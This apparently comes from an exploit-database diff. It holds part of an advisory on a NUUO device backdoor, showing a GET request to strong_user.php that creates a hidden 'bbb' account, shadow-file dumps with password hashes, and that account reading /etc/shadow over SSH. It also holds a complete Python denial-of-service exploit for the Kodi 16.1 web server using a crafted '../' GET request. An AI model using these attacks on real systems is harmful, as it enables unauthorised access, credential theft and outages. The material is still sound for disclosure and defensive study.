uucp:*:14495:0:99999:7:::
operator:*:14495:0:99999:7:::
games:*:14495:0:99999:7:::
gopher:*:14495:0:99999:7:::
ftp:*:14495:0:99999:7:::
nobody:*:14495:0:99999:7:::
vcsa:!!:14564::::::
sshd:!!:14564::::::
guest::14564:0:99999:7:::
#2
Issuing GET request to the script:
-----------------------------------
GET http://10.0.0.17/strong_user.php HTTP/1.1
#3
Read of /etc/shadow file after backdoor was enabled:
-----------------------------------------------------
root@nuuo:~# cat /etc/shadow
#root:$1$1b0pmacH$sP7VdEAv01TvOk1JSl2L6/:14495:0:99999:7:::
root:$1$vd3TecoS$VyBh4/IsumZkqFU.1wfrV.:14461:0:99999:7:::
bin:*:14495:0:99999:7:::
daemon:*:14495:0:99999:7:::
adm:*:14495:0:99999:7:::
lp:*:14495:0:99999:7:::
sync:*:14495:0:99999:7:::
shutdown:*:14495:0:99999:7:::
halt:*:14495:0:99999:7:::
mail:*:14495:0:99999:7:::
uucp:*:14495:0:99999:7:::
operator:*:14495:0:99999:7:::
games:*:14495:0:99999:7:::
gopher:*:14495:0:99999:7:::
ftp:*:14495:0:99999:7:::
nobody:*:14495:0:99999:7:::
vcsa:!!:14564::::::
sshd:!!:14564::::::
guest::14564:0:99999:7:::
bbb:$1$gYfUNAQN$.sn8WpIO5gNoOQeZzSyBI/:16915:0:99999:7:::
#4
The backdoor account is able to read the /etc/shadow file:
-----------------------------------------------------------
login as: bbb
bbb@10.0.0.17's password:
-sh-3.2$ id
Using fallback suid method
uid=1004(bbb) gid=1000(poweruser) groups=1000(poweruser)
-sh-3.2$ cat /etc/shadow
Using fallback suid method
#root:$1$1b0pmacH$sP7VdEAv01TvOk1JSl2L6/:14495:0:99999:7:::
root:$1$vd3TecoS$VyBh4/IsumZkqFU.1wfrV.:14461:0:99999:7:::
bin:*:14495:0:99999:7:::
daemon:*:14495:0:99999:7:::
adm:*:14495:0:99999:7:::
lp:*:14495:0:99999:7:::
sync:*:14495:0:99999:7:::
shutdown:*:14495:0:99999:7:::
halt:*:14495:0:99999:7:::
mail:*:14495:0:99999:7:::
uucp:*:14495:0:99999:7:::
operator:*:14495:0:99999:7:::
games:*:14495:0:99999:7:::
gopher:*:14495:0:99999:7:::
ftp:*:14495:0:99999:7:::
nobody:*:14495:0:99999:7:::
vcsa:!!:14564::::::
sshd:!!:14564::::::
guest::14564:0:99999:7:::
bbb:$1$gYfUNAQN$.sn8WpIO5gNoOQeZzSyBI/:16915:0:99999:7:::
-sh-3.2$

54
platforms/windows/dos/40208.py Executable file
View file

@ -0,0 +1,54 @@
# Exploit Title: Kodi 16.1 Web Server Remote DoS
# Date: 06/08/2016
# Exploit Author: Guillaume Kaddouch
# Twitter: @gkweb76
# Blog: https://networkfilter.blogspot.com
# GitHub: https://github.com/gkweb76/exploits
# Vendor Homepage: https://kodi.tv/
# Software Link: http://mirrors.kodi.tv/releases/win32/kodi-16.1-Jarvis.exe
# Version: 16.1
# Tested on: Windows 7 Family x64 (FR)
# Category: DoS
"""
Disclosure Timeline:
--------------------
2016-08-02: Vulnerability discovered
2016-08-04: Vendor contacted
2016-08-04: Developper answered. Kodi v16 is End Of Life and will not be fixed.
2016-08-06: Exploit published.
Description :
-------------
A remote Denial Of Service exists in Kodi 16.1 (Jarvis) embedded web server when sending a specially crafted GET request.
The web server is disabled by default.
Instructions:
-------------
- Starts Kodi, and enable the web server in System, Services, Web server.
- Run this exploit locally or from your remote attacking machine.
"""
import socket
host = "192.168.135.129"
port = 8080
junk = '../' * 10
buffer = "GET " + junk + " HTTP/1.1\r\n"
buffer += "\r\n\r\n"
try:
print "[*] Connecting to %s:%d" % (host, port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print "[*] Sending buffer... (%d bytes)" % len(buffer)
s.send(buffer)
s.close()
print "[*] Done."
except:
print "[-] Error connecting"